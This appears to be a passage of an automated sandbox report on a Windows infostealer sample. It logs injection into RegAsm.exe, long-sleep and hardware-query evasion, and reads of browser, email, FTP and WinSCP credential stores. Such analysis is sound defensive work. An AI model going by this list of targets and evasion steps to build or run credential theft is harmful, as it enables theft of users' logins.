                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: D6yz87XjgM.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: D6yz87XjgM.exeStatic file information: File size 1653512 > 1048576
                      Source: D6yz87XjgM.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x17d000
                      Source: D6yz87XjgM.exeStatic PE information: real checksum: 0x198c68 should be: 0x19997c
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_00408114 pushfd ; retf 0040h4_2_00408115
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0227032D push cs; ret 4_2_02270330
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02271419 push ss; retf 4_2_0227141A
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0227589A pushad ; retf 4_2_022758A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044277B pushad ; retf 8_2_00442788
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00442F01 push ebp; retf 8_2_00442F02
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_02EA0C6D push edi; retf 8_2_02EA0C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_02EA0C45 push ebx; retf 8_2_02EA0C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_06A1FAF3 push es; ret 8_2_06A1FAF4
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4EE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1939Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3540Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7916Thread sleep count: 109 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7916Thread sleep time: -109000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8004Thread sleep count: 1939 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8004Thread sleep count: 3540 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99734s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99625s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99501s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99375s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99265s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99153s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -99047s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98934s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98827s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98716s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98606s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98483s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98375s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98265s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98156s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -98047s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97937s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97828s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97719s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97609s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97390s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97280s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97172s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -97062s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8000Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99501Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99265Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99153Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98934Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 98827
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 98716
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 98606
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 98483
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 98375
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 98265
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 98156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 98047
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 97937
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 97828
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 97719
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 97609
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 97500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 97390
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 97280
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 97172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 97062
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
                      Source: RegAsm.exe, 00000008.00000002.2539938968.0000000006290000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_0054A84C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_0054A860 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_0054AB35 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_0054A7DA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_02272B06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_02276A17 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_02276F4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_02276C57 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_022730D7 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_022768DC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_0227690D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Code function: 4_2_02276965 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00443846 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004438F8 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044388F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044448A mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004438AB mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00443D84 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00443E2E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00443AE6 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00443B38 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004437EE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004437BD mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 558008
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D3D008
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.D6yz87XjgM.exe.4090000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: D6yz87XjgM.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7908, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 4.2.D6yz87XjgM.exe.4090000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: D6yz87XjgM.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7908, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.D6yz87XjgM.exe.4090000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
